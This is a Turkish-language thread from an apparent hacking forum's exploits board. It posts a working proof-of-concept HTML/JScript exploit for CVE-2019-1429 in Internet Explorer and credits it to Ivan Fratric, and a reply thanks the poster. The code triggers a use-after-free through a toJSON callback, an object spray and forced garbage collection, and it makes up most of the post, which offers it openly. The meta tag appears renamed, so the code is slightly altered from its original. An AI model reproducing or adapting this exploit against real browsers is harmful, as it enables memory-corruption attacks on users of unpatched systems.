İnternet Explorer Arama Motoru'nda ciddi açık!

'Exploitler / Güncel Açıklar' forumunda AtakBey tarafından 23 Kas 2019 tarihinde açılan konu

  1. AtakBey

    AtakBey Yaşlı Kurt Site Yetkilisi Yaşlı Kurt Yönetim Kurulu

    2019'un kasım ayının 22.Gününde bulunan bir internet explorer exploiti, Ivan Fratric Tarafından Yazılmış Bir Exploittir.
    CVE: CVE-2019-1429
    CWE: CWE-119
    Yazar: Ivan Fratric
    Risk: High
    Remote: Yes

    EXPLOIT
    Kod:
    ===========================================================
    
    <!-- saved from url=(0014)about:internet -->
    <ben-bir-metaciyim http-equiv=\"X-UA-Compatible\" content=\"IE=8\"></ben-bir-metaciyim>
    <script language=\"Jscript.Encode\">
        var spray = new Array();
    
        function F() {
            alert('callback');
    
            // 2. Create a bunch of objects
            for (var i = 0; i < 20000; i++) spray = new Object();
    
            // 3. Store a reference to one of them in the arguments array
            //    The arguments array isn't tracked by garbage collector
            arguments[0] = spray[5000];
    
            // 4. Delete the objects and call the garbage collector
            //    All JSCript variables get reclaimed...
            for (var i = 0; i < 20000; i++) spray = 1;
            CollectGarbage();
    
            // 5. But we still have reference to one of them in the
            //    arguments array
            alert(arguments[0]);
        }
    
        // 1. Cause toJSON callback to fire
        var o = {toJSON:F}
        JSON.stringify(o);
    
        alert('done');
    
    </script>
    
    ===========================================================
    
     
  2. SonTürk

    SonTürk Sadece Bizi Bekleyin. Site Yetkilisi Forum Denetleme Gözlem Sorumlusu

    • Elinize sağlık amirim.
     
    AtakBey bunu beğendi.